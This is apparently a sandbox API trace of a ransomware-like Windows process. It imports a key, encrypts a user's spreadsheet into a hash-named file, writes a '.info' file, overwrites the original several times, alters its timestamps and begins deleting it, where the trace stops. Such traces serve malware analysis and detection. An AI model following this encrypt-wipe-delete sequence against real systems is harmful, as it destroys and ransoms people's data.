CryptImportKey (in: hProv=0x1a5b8010, pbData=0x2242830, dwDataLen=0x1c, hPubKey=0x0, dwFlags=0x1, phKey=0x1bf5d0f0 | out: phKey=0x1bf5d0f0*=0x1a626de0) returned 1 [0076.197] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.197] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.197] CryptDuplicateKey (in: hKey=0x1a626de0, pdwReserved=0x0, dwFlags=0x0, phKey=0x1bf5d0e0 | out: phKey=0x1bf5d0e0*=0x1a626ad0) returned 1 [0076.197] CryptContextAddRef (hProv=0x1a5b8010, pdwReserved=0x0, dwFlags=0x0) returned 1 [0076.197] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x4, pbData=0x2242978*=0x1, dwFlags=0x0) returned 1 [0076.197] CryptSetKeyParam (hKey=0x1a626ad0, dwParam=0x1, pbData=0x2242928, dwFlags=0x0) returned 1 [0076.197] CryptDestroyKey (hKey=0x1a626de0) returned 1 [0076.197] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.197] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.197] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.197] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.197] GetFileType (hFile=0x36c) returned 0x1 [0076.197] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.197] GetFileType (hFile=0x36c) returned 0x1 [0076.198] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", nBufferLength=0x105, lpBuffer=0x1bf5cb50, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", lpFilePart=0x0) returned 0x51 [0076.198] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d030) returned 1 [0076.198] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x3a4 [0076.198] GetFileType (hFile=0x3a4) returned 0x1 [0076.198] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfa0) returned 1 [0076.198] GetFileType (hFile=0x3a4) returned 0x1 [0076.198] ReadFile (in: hFile=0x36c, lpBuffer=0x2242d68, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2242d68*, lpNumberOfBytesRead=0x1bf5d128*=0x5a7f, lpOverlapped=0x0) returned 1 [0076.199] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2256d80*, pdwDataLen=0x1bf5d180*=0x5a70, dwBufLen=0x5a70 | out: pbData=0x2256d80*, pdwDataLen=0x1bf5d180*=0x5a70) returned 1 [0076.199] WriteFile (in: hFile=0x3a4, lpBuffer=0x2256d80*, nNumberOfBytesToWrite=0x5a70, lpNumberOfBytesWritten=0x1bf5d118, lpOverlapped=0x0 | out: lpBuffer=0x2256d80*, lpNumberOfBytesWritten=0x1bf5d118*=0x5a70, lpOverlapped=0x0) returned 1 [0076.200] ReadFile (in: hFile=0x36c, lpBuffer=0x2242d68, nNumberOfBytesToRead=0x14000, lpNumberOfBytesRead=0x1bf5d128, lpOverlapped=0x0 | out: lpBuffer=0x2242d68*, lpNumberOfBytesRead=0x1bf5d128*=0x0, lpOverlapped=0x0) returned 1 [0076.200] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x225c830*, pdwDataLen=0x1bf5d0c0*=0x10, dwBufLen=0x10 | out: pbData=0x225c830*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.200] CryptEncrypt (in: hKey=0x1a626ad0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x225c880*, pdwDataLen=0x1bf5d0c0*=0x0, dwBufLen=0x10 | out: pbData=0x225c880*, pdwDataLen=0x1bf5d0c0*=0x10) returned 1 [0076.200] WriteFile (in: hFile=0x3a4, lpBuffer=0x225c8d0*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x1bf5d048, lpOverlapped=0x0 | out: lpBuffer=0x225c8d0*, lpNumberOfBytesWritten=0x1bf5d048*=0x10, lpOverlapped=0x0) returned 1 [0076.201] CloseHandle (hObject=0x3a4) returned 1 [0076.201] CloseHandle (hObject=0x36c) returned 1 [0076.201] CryptDestroyKey (hKey=0x1a626e50) returned 1 [0076.201] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.202] CryptReleaseContext (hProv=0x1a5b8010, dwFlags=0x0) returned 1 [0076.202] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", nBufferLength=0x105, lpBuffer=0x1bf5cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA", lpFilePart=0x0) returned 0x51 [0076.202] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d060) returned 1 [0076.202] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.202] GetFileType (hFile=0x36c) returned 0x1 [0076.202] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cfd0) returned 1 [0076.202] GetFileType (hFile=0x36c) returned 0x1 [0076.202] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.203] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.204] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.205] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.206] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x1000, lpOverlapped=0x0) returned 1 [0076.206] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0xa80, lpOverlapped=0x0) returned 1 [0076.206] ReadFile (in: hFile=0x36c, lpBuffer=0x225dfd8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1bf5d148, lpOverlapped=0x0 | out: lpBuffer=0x225dfd8*, lpNumberOfBytesRead=0x1bf5d148*=0x0, lpOverlapped=0x0) returned 1 [0076.207] CloseHandle (hObject=0x36c) returned 1 [0076.208] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA.info", nBufferLength=0x105, lpBuffer=0x1bf5c900, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA.info", lpFilePart=0x0) returned 0x56 [0076.208] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5cde0) returned 1 [0076.208] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\9FF71BF81A34AD04E697E9DCE5D8A9DA.info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\9ff71bf81a34ad04e697e9dce5d8a9da.info"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.209] GetFileType (hFile=0x36c) returned 0x1 [0076.209] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cd50) returned 1 [0076.209] GetFileType (hFile=0x36c) returned 0x1 [0076.209] WriteFile (in: hFile=0x36c, lpBuffer=0x226a6c8*, nNumberOfBytesToWrite=0x77d, lpNumberOfBytesWritten=0x1bf5ceb8, lpOverlapped=0x0 | out: lpBuffer=0x226a6c8*, lpNumberOfBytesWritten=0x1bf5ceb8*=0x77d, lpOverlapped=0x0) returned 1 [0076.210] CloseHandle (hObject=0x36c) returned 1 [0076.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d170) returned 1 [0076.211] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), fInfoLevelId=0x0, lpFileInformation=0x1bf5d250 | out: lpFileInformation=0x1bf5d250*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x252c94c0, ftCreationTime.dwHighDateTime=0x1d4ca9a, ftLastAccessTime.dwLowDateTime=0x4923ad70, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0x4923ad70, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x5a7f)) returned 1 [0076.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d130) returned 1 [0076.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.211] SetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", dwFileAttributes=0x80) returned 1 [0076.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d1b0) returned 1 [0076.211] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), fInfoLevelId=0x0, lpFileInformation=0x22722f0 | out: lpFileInformation=0x22722f0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x252c94c0, ftCreationTime.dwHighDateTime=0x1d4ca9a, ftLastAccessTime.dwLowDateTime=0x4923ad70, ftLastAccessTime.dwHighDateTime=0x1d4cac5, ftLastWriteTime.dwLowDateTime=0x4923ad70, ftLastWriteTime.dwHighDateTime=0x1d4cac5, nFileSizeHigh=0x0, nFileSizeLow=0x5a7f)) returned 1 [0076.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d170) returned 1 [0076.211] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cbc0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.211] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d0a0) returned 1 [0076.211] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.211] GetFileType (hFile=0x36c) returned 0x1 [0076.211] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5d010) returned 1 [0076.211] GetFileType (hFile=0x36c) returned 0x1 [0076.212] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.212] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.213] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.214] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.215] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.215] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.216] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.216] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.217] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.217] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.218] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.219] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.220] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.220] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.220] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.225] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.226] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.227] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.227] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.228] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.229] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.229] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d208*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d208*=0) returned 0x0 [0076.229] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.230] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.231] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.232] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.232] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0x1000, lpNumberOfBytesWritten=0x1bf5d1d8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1d8*=0x1000, lpOverlapped=0x0) returned 1 [0076.233] WriteFile (in: hFile=0x36c, lpBuffer=0x22727d8*, nNumberOfBytesToWrite=0xc00, lpNumberOfBytesWritten=0x1bf5d1a8, lpOverlapped=0x0 | out: lpBuffer=0x22727d8*, lpNumberOfBytesWritten=0x1bf5d1a8*=0xc00, lpOverlapped=0x0) returned 1 [0076.233] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.233] SetEndOfFile (hFile=0x36c) returned 1 [0076.234] SetFilePointer (in: hFile=0x36c, lDistanceToMove=0, lpDistanceToMoveHigh=0x1bf5d218*=0, dwMoveMethod=0x2 | out: lpDistanceToMoveHigh=0x1bf5d218*=0) returned 0x0 [0076.234] CloseHandle (hObject=0x36c) returned 1 [0076.234] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.234] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.234] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.234] GetFileType (hFile=0x36c) returned 0x1 [0076.234] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.234] GetFileType (hFile=0x36c) returned 0x1 [0076.234] SetFileTime (hFile=0x36c, lpCreationTime=0x1bf5d278, lpLastAccessTime=0x0, lpLastWriteTime=0x0) returned 1 [0076.235] CloseHandle (hObject=0x36c) returned 1 [0076.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.235] GetFileType (hFile=0x36c) returned 0x1 [0076.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.235] GetFileType (hFile=0x36c) returned 0x1 [0076.235] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x1bf5d278, lpLastWriteTime=0x0) returned 1 [0076.235] CloseHandle (hObject=0x36c) returned 1 [0076.235] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cb30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.235] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x1bf5d010) returned 1 [0076.235] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x36c [0076.235] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x1bf5cf80) returned 1 [0076.235] SetFileTime (hFile=0x36c, lpCreationTime=0x0, lpLastAccessTime=0x0, lpLastWriteTime=0x1bf5d278) returned 1 [0076.236] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", nBufferLength=0x105, lpBuffer=0x1bf5cd30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls", lpFilePart=0x0) returned 0x45 [0076.237] DeleteFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\FqQwPD4U\\C8fZE7oaFi0AnXAu.xls" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fqqwpd4u\\c8fze7oafi0anxau.xls")) returned 